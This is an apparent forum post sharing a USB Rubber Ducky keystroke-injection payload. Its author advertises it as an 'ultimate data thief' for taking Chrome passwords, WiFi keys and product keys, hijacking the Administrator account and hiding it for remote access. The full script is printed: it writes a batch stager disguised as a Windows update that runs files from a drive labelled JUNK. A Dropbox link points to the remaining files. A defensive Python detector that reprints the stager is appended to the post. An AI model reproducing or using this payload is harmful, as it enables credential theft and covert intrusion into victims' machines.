UnKn0wnBooof Posted October 25, 2013

Ok, so there's a lot of cool Ducky scripts out there, my personal favourite is the script that steals Windows passwords - AWESOME!!! But do any scripts aim to get more than just a Windows password? Do any of them "Backup" Google Chrome Login Data, WiFi keys, Windows Product Keys or Replace the Administrator password or even hide the account so you can have "stealthy" remote access via Windows Shares (Known as SMB)?

I THINK PAYLOADS SHOULD DO MORE! So... I introduce the ULTIMATE DATA THIEF!!!

Payload:

DELAY 15000
REM Author: Lavanoid Volcanic
REM This script supports Windows XP as well as Vista and 7.
REM I don't have Windows 8 (I really want it though) so I can't test it.
REM This Script looks for the drive named "JUNK" because "DUCKY" is too exposing.
GUI d
DELAY 500
GUI r
DELAY 1500
STRING notepad.exe
DELAY 200
ENTER
DELAY 1500
STRING @echo off
DELAY 200
ENTER
DELAY 200
STRING Ti
DELAY 200
STRING tle = Installing Windows Update...
DELAY 200
ENTER
STRING @echo Installing Windows Update...
DELAY 200
ENTER
STRING set duck=
DELAY 200
ENTER
STRING COLOR F0
DELAY 200
ENTER
STRING :start
DELAY 200
ENTER
STRING if not "%LOCALAPPDATA%"=="" goto win_new
DELAY 200
ENTER
STRING for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "JUNK"') do set duck=%%A
DELAY 200
ENTER
STRING if "%duck%"=="" goto start
DELAY 200
ENTER
STRING set duck=%duck%:
DELAY 200
ENTER
STRING %duck%
DELAY 200
ENTER
STRING CD "Data"
DELAY 200
ENTER
STRING "SCRIPT_EX.exe" "SP.bat"
DELAY 200
ENTER
STRING EXIT
DELAY 200
ENTER
STRING :win_new
DELAY 400
ENTER
DELAY 400
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "JUNK"') do set duck=%%d
DELAY 200
ENTER
STRING if "%duck%"=="" goto start
DELAY 200
ENTER
STRING %duck%
DELAY 200
ENTER
STRING CD "Data"
DELAY 200
ENTER
STRING "SCRIPT_EX.exe" "SP.bat"
DELAY 200
ENTER
STRING EXIT
DELAY 200
ENTER
CTRL S
DELAY 1500
STRING %TEMP%\DS.bat
DELAY 1000
ENTER
DELAY 600
ALT Y
DELAY 700
ALT F4
GUI r
DELAY 1500
STRING %TEMP%\DS.bat
ENTER
DELAY 1000
ALT y
DELAY 500
ALT y
DELAY 500
ALT y
DELAY 500
ALT y
DELAY 500
ALT y
DELAY 500
ALT y
DELAY 500
ALT y
GUI r
DELAY 1200
STRING explorer.exe
ENTER
DELAY 1500
ALT F4

Unfortunately, the forum only allows a maximum of 500kb of upload space and the extra data is just over 1MB so I put the file on my Dropbox account instead.

Link: https://www.dropbox.com/sh/ad8jegywipd3l76/jo2KqlU3CB

READ ME!!.txt contents:

SCRIPT/PAYLOAD BY LAVANOID VOLCANIC

THE DIRECTORIES ABOVE OR BELOW (DEPENDING ON YOUR CONFIGURATION) SHOULD BE COPIED TO THE ROOT DIRECTORY OF THE DUCKY DRIVE. YOU SHOULD EDIT THE SP.BAT FILE AND THE INJECT.TXT FILE TO SUIT YOUR REQUIREMENTS.

FILE LOCATIONS:
SP.bat -- Data\SP.bat
inject.txt -- Scripts\Projects\Steal_Data\inject.txt
Compiler.bat -- Scripts\Compiler.bat

COMPILER.bat description:
The compiler batch file basically takes away the hassle of entering all those annoying time draining commands. If the Compiler.bat file is stored on the Duck, the compiler will ask if you want to install it on the Duck.

WHAT I HOPE:
I hope that my project will be featured in one of the Hak5 videos since I do like some attention. THIS WORLD IS LONELY YOU KNOW!!

Thank you for choosing to spend a bit of your time by poking your nose into my work.
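For defenders, the batch stager that the payload above types into Notepad has a recognisable shape: look up a volume by its label, switch to that drive, then run a file from it. The following is an added example, not part of the original post, that flags that chain in a batch file's text; the rule names, the `analyze` function and the benign sample are assumptions made here, and the stager sample is rebuilt from the STRING lines above.

```python
import re

# "for /f" loop that resolves a drive letter from a volume label (both variants used above).
LOOKUP = re.compile(
    r"for\s+/f\b.*(wmic\s+volume\s+get\s+driveletter|list\s+volume\s*\|\s*diskpart)"
    r".*findstr.*\bdo\s+set\s+(\w+)=%%\w", re.I)
DECOY = re.compile(r"^@?(title|echo)\b.*installing windows update", re.I)
RUNS_FILE = re.compile(r'^"?[^"\s]+\.(exe|bat|cmd|vbs|ps1)"?(\s|$)', re.I)
CORE = {"volume_label_lookup", "switch_to_looked_up_drive", "exec_after_drive_switch"}

def analyze(batch_text):
    """Return matched rule names and whether the full lookup/switch/exec chain is present."""
    hits, drive_vars, switched = set(), set(), False
    for raw in batch_text.splitlines():
        line = raw.strip().replace("^", "")  # drop batch escape carets
        m = LOOKUP.search(line)
        if m:
            drive_vars.add(m.group(2).lower())
            hits.add("volume_label_lookup")
        elif line.lower().strip(":") in {f"%{v}%" for v in drive_vars}:
            switched = True  # a bare %var% line changes the current drive
            hits.add("switch_to_looked_up_drive")
        elif switched and RUNS_FILE.match(line):
            hits.add("exec_after_drive_switch")
        elif DECOY.match(line):
            hits.add("decoy_update_banner")
    return {"hits": sorted(hits), "suspicious": CORE <= hits}

# Constructed sample: the batch text the payload's STRING lines produce (XP branch shown).
STAGER = r'''@echo off
Title = Installing Windows Update...
set duck=
:start
for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "JUNK"') do set duck=%%A
if "%duck%"=="" goto start
set duck=%duck%:
%duck%
CD "Data"
"SCRIPT_EX.exe" "SP.bat"
EXIT'''

# Constructed benign sample: the same label lookup, used only as a copy destination.
BACKUP = r'''@echo off
for /f %%d in ('wmic volume get driveletter^, label ^| findstr "BACKUP"') do set dst=%%d
robocopy C:\Reports %dst%\Reports /MIR'''

if __name__ == "__main__":
    print(analyze(STAGER))
    print(analyze(BACKUP))
```

The label lookup on its own is common in legitimate backup scripts, which is why the verdict requires the drive switch and the execution step as well.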